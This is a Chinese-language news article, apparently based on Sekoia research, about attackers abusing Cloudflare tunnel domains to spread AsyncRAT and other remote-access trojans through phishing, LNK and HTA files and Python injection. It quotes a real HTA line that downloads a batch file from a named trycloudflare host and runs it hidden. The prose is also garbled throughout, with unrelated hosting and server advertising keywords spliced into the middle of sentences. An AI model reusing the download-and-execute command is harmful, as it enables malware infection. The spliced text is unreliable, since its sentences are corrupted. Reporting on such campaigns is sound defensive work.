黑客滥用 Cloudflare 隧道基础设施传播多种远程访问木马

网络安全专家发现一起复杂攻击活动，黑客攻击者利用Cloudflare的滥用隧道基础设施分发多种远程访问木马（RAT） 。

该基础设施自2024年2月以来展现出极强的隧道设施持久性，作为恶意文件和木马的基础分发平台，使攻击者能够未经授权访问受害者系统。传播

包括Forcepoint、多种Fortinet、远程Orange和Proofpoint在内的访问安全厂商已记录这一持续性威胁 ，源码下载强调其不断演变的木马特性以及对全球组织日益增长的影响。

初始感染途径

主要感染途径始于包含恶意附件的黑客钓鱼邮件，这些附件伪装成发票或订单文件 。滥用

这类邮件通常制造虚假紧迫感，隧道设施并可能包含伪造的基础对话记录和回复以显得真实可信。

附件通常采用"application/windows-library+xml"文件格式，传播由于相比二进制文件看似无害 ，香港云服务器多种经常能绕过电子邮件安全网关。

当用户打开文件时，会建立与托管在Cloudflare隧道基础设施上的远程WebDav资源的连接。

攻击基础设施分析

Sekoia威胁检测与研究（TDR）团队持续监控这一攻击基础设施
，内部代号为"Cloudflare隧道基础设施传播多种RAT"。

分析显示，攻击采用复杂的多阶段感染链，运用多种混淆技术规避检测系统。云计算这种复杂性表明，即便在2025年，威胁行为体仍在开发创新方法来绕过现代安全控制措施。

攻击者利用带有"trycloudflare.com"后缀的域名（如"malawi-light-pill-bolt.trycloudflare.com"和"players-time-corresponding-th.trycloudflare.com"等）托管恶意内容 
。该基础设施最终投放的载荷会在受感染系统上建立持久远程访问，可能导致数据窃取和进一步网络入侵。

感染链技术细节

感染过程始于用户与伪装成PDF文档的LNK文件交互。该快捷方式并非打开合法文档，建站模板而是从同一远程服务器执行HTA文件。HTA内容揭示攻击进展：

复制`Set oShell = CreateObject("WScript.Shell") oShell.Run "cmd. exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat", 0, false self. Close`1.

此脚本触发BAT文件安装Python并执行混淆的Python代码，随后将下一阶段载荷注入"notepad.exe"进程。

注入notepad.exe进程（来源：Sekoia）

为实现持久化，恶意软件创建启动项，包含两个VBS文件和另一个放置在Windows启动文件夹中的BAT文件
。

最终阶段使用PowerShell反射加载从JPEG图像下载的载荷（内含base64编码的源码库载荷），通过"duckdns.org"等动态DNS服务建立与命令控制服务器的RAT连接。

感染链示意图（来源：Sekoia）

通过涉及Windows-library文件、LNK文件、HTA执行和Python注入的复杂多阶段过程分发AsyncRAT的感染链

该攻击活动的演变表明，威胁行为体持续调整技术以绕过安全控制，凸显了采用多层检测方法和持续监控类似攻击模式的高防服务器重要性。